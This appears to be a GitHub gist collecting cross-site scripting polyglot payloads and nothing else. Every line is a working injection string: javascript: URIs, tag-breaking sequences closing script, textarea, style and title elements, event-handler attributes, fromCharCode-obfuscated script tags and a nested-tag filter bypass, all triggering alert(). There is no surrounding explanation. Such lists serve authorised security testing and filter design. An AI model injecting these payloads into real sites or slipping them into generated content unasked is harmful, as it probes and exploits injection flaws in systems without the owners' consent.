javascript://'//" --></textarea></style></script></title><b onclick= alert()//>*/alert()/*
javascript://</title></textarea></style></script --><li '//" '*/alert()/*', onclick=alert()//
javascript:alert()//--></script></textarea></style></title><a"//' onclick=alert()//>*/alert()/*
--></script></title></style>"/</textarea><a' onclick=alert()//>*/alert()/*
/</title/'/</style/</script/</textarea/--><p" onclick=alert()//>*/alert()/*
javascript://--></title></style></textarea></script><svg "//' onclick=alert()//
/</title/'/</style/</script/--><p" onclick=alert()//>*/alert()/*
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
javascript:"/*'/*`/*\" /*</title></style></textarea></noscript></noembed></template></script/-->&lt;svg/onload=/*<html/*/onmouseover=alert()//>javascript:"/*\"/*`/*' /*</template></textarea></noembed></noscript></title></style></script>-->&lt;svg onload=/*<html/*/onmouseover=alert()//>
javascript:`//"//\"//</title></textarea></style></noscript></noembed></script></template>&lt;svg/onload='/*--><html */ onmouseover=alert()//'>`
<script>alert('XSS')</script>
<scr<script>ipt>alert('XSS')</scr<script>ipt>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment